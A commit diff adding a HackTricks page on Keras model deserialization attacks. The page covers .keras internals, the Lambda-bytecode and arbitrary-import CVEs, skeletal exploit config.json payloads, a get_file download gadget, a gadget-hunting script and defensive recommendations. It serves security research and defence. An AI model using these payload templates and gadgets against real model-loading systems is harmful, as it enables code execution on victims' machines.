Commit 1624c21

Merge pull request #1313 from HackTricks-wiki/update_Hunting_Vulnerabilities_in_Keras_Model_Deserializa_20250820_124658
Hunting Vulnerabilities in Keras Model Deserialization
2 parents ed872d2 + 3227cd6 commit 1624c21

4 files changed

Lines changed: 231 additions & 1 deletion

src/AI/AI-Models-RCE.md

Lines changed: 10 additions & 1 deletion
@@ -177,11 +177,20 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
     tf.add(PAYLOAD) # rides the symlink
 ```

+### Deep-dive: Keras .keras deserialization and gadget hunting
+
+For a focused guide on .keras internals, Lambda-layer RCE, the arbitrary import issue in ≤ 3.8, and post-fix gadget discovery inside the allowlist, see:
+
+
+{{#ref}}
+../generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md
+{{#endref}}
+
 ## References

 - [OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/)
 - [InvokeAI patch commit 756008d](https://github.com/invoke-ai/invokeai/commit/756008dc5899081c5aa51e5bd8f24c1b3975a59e)
 - [Rapid7 Metasploit module documentation](https://www.rapid7.com/db/modules/exploit/linux/http/invokeai_rce_cve_2024_12029/)
 - [PyTorch – security considerations for torch.load](https://pytorch.org/docs/stable/notes/serialization.html#security)

-{{#include ../banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}

src/SUMMARY.md

Lines changed: 1 addition & 0 deletions
@@ -69,6 +69,7 @@
 - [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md)
 - [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md)
 - [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md)
+- [Keras Model Deserialization Rce And Gadget Hunting](generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md)
 - [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md)
 - [Pyscript](generic-methodologies-and-resources/python/pyscript.md)
 - [venv](generic-methodologies-and-resources/python/venv.md)

src/generic-methodologies-and-resources/python/README.md

Lines changed: 1 addition & 0 deletions
@@ -7,6 +7,7 @@

 - [**Pyscript hacking tricks**](pyscript.md)
 - [**Python deserializations**](../../pentesting-web/deserialization/README.md)
+- [**Keras model deserialization RCE and gadget hunting**](keras-model-deserialization-rce-and-gadget-hunting.md)
 - [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/README.md)
 - [**Basic python web requests syntax**](web-requests.md)
 - [**Basic python syntax and libraries**](basic-python.md)

src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md

Lines changed: 219 additions & 0 deletions
@@ -0,0 +1,219 @@
# Keras Model Deserialization RCE and Gadget Hunting

{{#include ../../banners/hacktricks-training.md}}

This page summarizes practical exploitation techniques against the Keras model deserialization pipeline, explains the native .keras format internals and attack surface, and provides a researcher toolkit for finding Model File Vulnerabilities (MFVs) and post-fix gadgets.

## .keras model format internals

A .keras file is a ZIP archive containing at least:
- metadata.json – generic info (e.g., Keras version)
- config.json – model architecture (primary attack surface)
- model.weights.h5 – weights in HDF5

The config.json drives recursive deserialization: Keras imports modules, resolves classes/functions and reconstructs layers/objects from attacker-controlled dictionaries.
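
Because the container is a plain ZIP archive, config.json can be reviewed without invoking any Keras loader. The following is a minimal sketch using only the standard library; the helper names `read_keras_config` and `make_demo_archive` are hypothetical, and the demo archive is a stand-in built in memory rather than a real saved model.

```python
import io
import json
import zipfile


def read_keras_config(path_or_file):
    """Return the parsed config.json from a .keras archive.

    Only the ZIP member is read; no Keras code runs and nothing is deserialized
    into layers.
    """
    with zipfile.ZipFile(path_or_file) as zf:
        with zf.open("config.json") as fh:
            return json.load(fh)


def make_demo_archive():
    """Build a tiny in-memory stand-in for a .keras file (illustrative only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("metadata.json", json.dumps({"keras_version": "3.9.0"}))
        zf.writestr(
            "config.json",
            json.dumps(
                {"module": "keras.layers", "class_name": "Dense", "config": {"units": 64}}
            ),
        )
    buf.seek(0)
    return buf


demo_config = read_keras_config(make_demo_archive())
print(demo_config["module"], demo_config["class_name"])
```

The same helper accepts a filesystem path, so it can be pointed at a downloaded model before deciding whether to load it.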

Example snippet for a Dense layer object:

```json
{
  "module": "keras.layers",
  "class_name": "Dense",
  "config": {
    "units": 64,
    "activation": {
      "module": "keras.activations",
      "class_name": "relu"
    },
    "kernel_initializer": {
      "module": "keras.initializers",
      "class_name": "GlorotUniform"
    }
  }
}
```

Deserialization performs:
- Module import and symbol resolution from module/class_name keys
- from_config(...) or constructor invocation with attacker-controlled kwargs
- Recursion into nested objects (activations, initializers, constraints, etc.)

Historically, this exposed three primitives to an attacker crafting config.json:
- Control of what modules are imported
- Control of which classes/functions are resolved
- Control of kwargs passed into constructors/from_config
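
To see which import and resolution targets a given config would request, the nested dictionaries can be walked statically. This is a rough sketch, not Keras code: `iter_object_refs` is a hypothetical helper, and it assumes every serialized object is a dict carrying a `class_name` key (with `module` optional), as in the Dense example.

```python
def iter_object_refs(node, path="$"):
    """Yield (json_path, module, class_name) for each serialized-object dict.

    Walks dicts and lists recursively, mirroring the recursion the deserializer
    performs, but never imports or instantiates anything.
    """
    if isinstance(node, dict):
        if "class_name" in node:
            yield path, node.get("module"), node["class_name"]
        for key, value in node.items():
            yield from iter_object_refs(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from iter_object_refs(item, f"{path}[{index}]")


dense_cfg = {
    "module": "keras.layers",
    "class_name": "Dense",
    "config": {
        "units": 64,
        "activation": {"module": "keras.activations", "class_name": "relu"},
        "kernel_initializer": {
            "module": "keras.initializers",
            "class_name": "GlorotUniform",
        },
    },
}

refs = list(iter_object_refs(dense_cfg))
for ref in refs:
    print(ref)
```

Each emitted tuple corresponds to one point where the attacker chooses a module and a symbol; the surrounding `config` dict is the kwargs primitive.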

## CVE-2024-3660 – Lambda-layer bytecode RCE

Root cause:
- Lambda.from_config() used python_utils.func_load(...), which base64-decodes attacker-supplied bytes and passes them to marshal.loads(). The resulting code object is wrapped in a Python function, so attacker-chosen bytecode runs when that function is invoked.
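
The mechanism can be reproduced with a harmless function and the standard library alone. The sketch below is not the Keras implementation; it only shows that bytes produced by `marshal.dumps` on a code object come back from `marshal.loads` as a code object that `types.FunctionType` turns into a callable. The function `greet` is a benign stand-in for attacker bytecode.

```python
import base64
import marshal
import types


def greet(name):
    return "hello " + name


# "Serialize": code object -> marshal bytes -> base64 text (what a config would carry).
blob = base64.b64encode(marshal.dumps(greet.__code__)).decode("ascii")

# "Deserialize": base64 text -> marshal bytes -> code object -> callable function.
code_obj = marshal.loads(base64.b64decode(blob))
rebuilt = types.FunctionType(code_obj, {})

# Whatever the bytecode does happens here, when the rebuilt function is called.
result = rebuilt("keras")
print(result)
```

Nothing in this round trip validates what the bytecode does, which is why loading such blobs from an untrusted file amounts to running the file author's code.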

Exploit idea (simplified payload in config.json):

```json
{
  "module": "keras.layers",
  "class_name": "Lambda",
  "config": {
    "name": "exploit_lambda",
    "function": {
      "function_type": "lambda",
      "bytecode_b64": "<attacker_base64_marshal_payload>"
    }
  }
}
```

Mitigation:
- Keras enforces safe_mode=True by default. Serialized Python functions in Lambda are blocked unless a user explicitly opts out with safe_mode=False.

Notes:
- Legacy formats (older HDF5 saves) or older codebases may not enforce modern checks, so “downgrade” style attacks can still apply when victims use older loaders.

## CVE-2025-1550 – Arbitrary module import in Keras ≤ 3.8

Root cause:
- _retrieve_class_or_fn used unrestricted importlib.import_module() with attacker-controlled module strings from config.json.
- Impact: Arbitrary import of any installed module (or attacker-planted module on sys.path). Import-time code runs, then object construction occurs with attacker kwargs.
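
The two-step impact (import-time code, then construction with chosen kwargs) can be observed safely with a throwaway module. In this sketch the module name `demo_planted_pkg`, its `Danger` class, and the marker file are all hypothetical; the module is written to a temporary directory that is briefly placed on sys.path to stand in for an attacker-planted package.

```python
import importlib
import os
import sys
import tempfile

with tempfile.TemporaryDirectory() as tmp:
    marker = os.path.join(tmp, "imported.marker")
    module_source = (
        f"open({marker!r}, 'w').close()  # side effect at import time\n"
        "class Danger:\n"
        "    def __init__(self, **kwargs):\n"
        "        self.kwargs = kwargs\n"
    )
    with open(os.path.join(tmp, "demo_planted_pkg.py"), "w") as fh:
        fh.write(module_source)

    sys.path.insert(0, tmp)
    importlib.invalidate_caches()
    try:
        # Step 1: the module string alone is enough to run top-level code.
        mod = importlib.import_module("demo_planted_pkg")
        side_effect_ran = os.path.exists(marker)
        # Step 2: the resolved class is then built with config-supplied kwargs.
        obj = getattr(mod, "Danger")(arg="val")
    finally:
        sys.path.remove(tmp)
        sys.modules.pop("demo_planted_pkg", None)

print(side_effect_ran, obj.kwargs)
```

The marker file exists before any class is resolved, which is the point: the import itself is the first execution primitive.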

Exploit idea:

```json
{
  "module": "maliciouspkg",
  "class_name": "Danger",
  "config": {"arg": "val"}
}
```

Security improvements (Keras ≥ 3.9):
- Module allowlist: imports restricted to official ecosystem modules: keras, keras_hub, keras_cv, keras_nlp
- Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading
- Basic type checking: deserialized objects must match expected types
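
As an illustration of the allowlist idea (not the actual Keras check, whose exact logic is not reproduced here), a root-package comparison might look like the sketch below. `ALLOWED_ROOTS` and `is_allowed_module` are hypothetical names; the list of roots is taken from the bullet above.

```python
ALLOWED_ROOTS = ("keras", "keras_hub", "keras_cv", "keras_nlp")


def is_allowed_module(module_name):
    """Return True only if the dotted path starts with an allowlisted root package.

    The comparison is done on the first dotted component, so a look-alike such
    as "keras_evil" or "kerasx.layers" is rejected rather than prefix-matched.
    """
    if not isinstance(module_name, str) or not module_name:
        return False
    root = module_name.split(".", 1)[0]
    return root in ALLOWED_ROOTS


for candidate in ["keras.layers", "keras_hub.models", "maliciouspkg", "keras_evil"]:
    print(candidate, is_allowed_module(candidate))
```

Comparing whole components rather than using `str.startswith("keras")` is the design choice that matters: a naive prefix test would accept any package whose name merely begins with an allowed root.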

## Post-fix gadget surface inside allowlist

Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations.

Gadget via Lambda that references an allowed function (not serialized Python bytecode):

```json
{
  "module": "keras.layers",
  "class_name": "Lambda",
  "config": {
    "name": "dl",
    "function": {"module": "keras.utils", "class_name": "get_file"},
    "arguments": {
      "fname": "artifact.bin",
      "origin": "https://example.com/artifact.bin",
      "cache_dir": "/tmp/keras-cache"
    }
  }
}
```

Important limitation:
- Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable.
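
This constraint can be pre-screened with `inspect.signature`. The sketch below assumes the call shape is `func(input_tensor, **arguments)`, as described above; `tolerates_lambda_call` and the sample functions are hypothetical stand-ins, so candidate gadgets should still be checked against the signatures in the installed Keras version.

```python
import inspect


def tolerates_lambda_call(func, arguments):
    """Return True if func(<one positional>, **arguments) would bind successfully."""
    try:
        sig = inspect.signature(func)
    except (TypeError, ValueError):
        return False  # signature not introspectable (e.g., some builtins)
    try:
        sig.bind(object(), **arguments)
    except TypeError:
        return False
    return True


# Hypothetical stand-ins with different parameter shapes.
def fetch(fname=None, origin=None, cache_dir=None):
    pass


def no_args():
    pass


def kw_only(*, origin):
    pass


def var_args(*args, **kwargs):
    pass


print(tolerates_lambda_call(fetch, {"origin": "u"}))
print(tolerates_lambda_call(fetch, {"fname": "x", "origin": "u"}))
print(tolerates_lambda_call(no_args, {}))
print(tolerates_lambda_call(var_args, {"anything": 1}))
```

Note the second case: when the prepended tensor occupies the first parameter, passing that same parameter by name in `arguments` collides, so a gadget's first parameter effectively cannot be controlled through the config.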

Potential impacts of allowlisted gadgets:
- Arbitrary download/write (path planting, config poisoning)
- Network callbacks/SSRF-like effects depending on environment
- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists

## Researcher toolkit

1) Systematic gadget discovery in allowed modules

Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects.

```python
import importlib, inspect, pkgutil

ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"]

seen = set()

def iter_modules(mod):
    # Only packages have __path__; plain modules have no submodules to walk
    if not hasattr(mod, "__path__"):
        return
    for m in pkgutil.walk_packages(mod.__path__, mod.__name__ + "."):
        yield m.name

candidates = []
for root in ALLOWLIST:
    try:
        r = importlib.import_module(root)
    except Exception:
        continue  # package not installed in this environment
    for name in iter_modules(r):
        if name in seen:
            continue
        seen.add(name)
        try:
            m = importlib.import_module(name)
        except Exception:
            continue  # optional backends/dependencies may be missing
        for n, obj in inspect.getmembers(m):
            if inspect.isfunction(obj) or inspect.isclass(obj):
                sig = "(?)"  # fallback when the signature cannot be introspected
                try:
                    sig = str(inspect.signature(obj))
                except Exception:
                    pass
                doc = (inspect.getdoc(obj) or "").lower()
                text = f"{name}.{n} {sig} :: {doc}"
                # Heuristics: look for I/O or network-ish hints
                if any(x in doc for x in ["download", "file", "path", "open", "url", "http", "socket", "env", "process", "spawn", "exec"]):
                    candidates.append(text)

print("\n".join(sorted(candidates)[:200]))
```

2) Direct deserialization testing (no .keras archive needed)

Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects.

```python
from keras import layers

cfg = {
    "module": "keras.layers",
    "class_name": "Lambda",
    "config": {
        "name": "probe",
        "function": {"module": "keras.utils", "class_name": "get_file"},
        "arguments": {"fname": "x", "origin": "https://example.com/x"}
    }
}

# Observe behavior. If layers.deserialize does not accept safe_mode in your
# Keras version, keras.saving.deserialize_keras_object(cfg, safe_mode=True)
# is an alternative entry point.
layer = layers.deserialize(cfg, safe_mode=True)
```

3) Cross-version probing and formats

Keras exists in multiple codebases/eras with different guardrails and formats:
- TensorFlow built-in Keras: tensorflow/python/keras (legacy, slated for deletion)
- tf-keras: maintained separately
- Multi-backend Keras 3 (official): introduced native .keras

Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards.
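
When sorting a corpus of model files by format before testing, the container type can be sniffed from the bytes rather than trusted from the extension. This is a rough sketch: `sniff_model_format` is a hypothetical helper, it only checks for the HDF5 signature at offset 0 (HDF5 also permits the signature after a user block), and it treats any ZIP containing config.json as a .keras-style archive.

```python
import io
import zipfile

HDF5_MAGIC = b"\x89HDF\r\n\x1a\n"  # HDF5 format signature


def sniff_model_format(data):
    """Classify raw bytes as 'hdf5', 'keras-zip', 'zip', or 'unknown'."""
    if data.startswith(HDF5_MAGIC):
        return "hdf5"
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            if "config.json" in zf.namelist():
                return "keras-zip"
        return "zip"
    return "unknown"


# Build small samples in memory to exercise each branch.
zip_buf = io.BytesIO()
with zipfile.ZipFile(zip_buf, "w") as zf:
    zf.writestr("config.json", "{}")
keras_like = zip_buf.getvalue()

print(sniff_model_format(keras_like))
print(sniff_model_format(HDF5_MAGIC + b"\x00" * 8))
print(sniff_model_format(b"not a model"))
```

A mismatch between extension and sniffed format is itself worth flagging, since a loader may pick its code path from the content rather than the filename.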

## Defensive recommendations

- Treat model files as untrusted input. Only load models from trusted sources.
- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks.
- Do not set safe_mode=False when loading models unless you fully trust the file.
- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access.
- Enforce allowlists/signatures for model sources and integrity checking where possible.
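
One simple form of integrity checking is to pin a SHA-256 digest for each model and refuse to load anything that does not match. The sketch below uses only the standard library; `sha256_of` and `verify_pinned` are hypothetical helper names, and how the expected digest is distributed (for example, alongside a signed release) is assumed to be handled elsewhere.

```python
import hashlib
import hmac
import io


def sha256_of(fileobj, chunk_size=1 << 20):
    """Hash a binary file object in chunks so large models are not read at once."""
    digest = hashlib.sha256()
    for chunk in iter(lambda: fileobj.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()


def verify_pinned(fileobj, expected_hex):
    """Return True only if the content hashes to the pinned digest."""
    return hmac.compare_digest(sha256_of(fileobj), expected_hex.lower())


# Demo with in-memory bytes standing in for a model file.
pinned = hashlib.sha256(b"model-bytes").hexdigest()
ok = verify_pinned(io.BytesIO(b"model-bytes"), pinned)
tampered = verify_pinned(io.BytesIO(b"model-bytes-modified"), pinned)
print(ok, tampered)
```

A digest check only proves the file is the one that was pinned; it does not make a malicious model safe, so it complements rather than replaces safe_mode and sandboxing.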

## References

- [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization)
- [Keras PR #20751 – Added checks to serialization](https://github.com/keras-team/keras/pull/20751)
- [CVE-2024-3660 – Keras Lambda deserialization RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-3660)
- [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550)
- [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e)
- [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3)

{{#include ../../banners/hacktricks-training.md}}
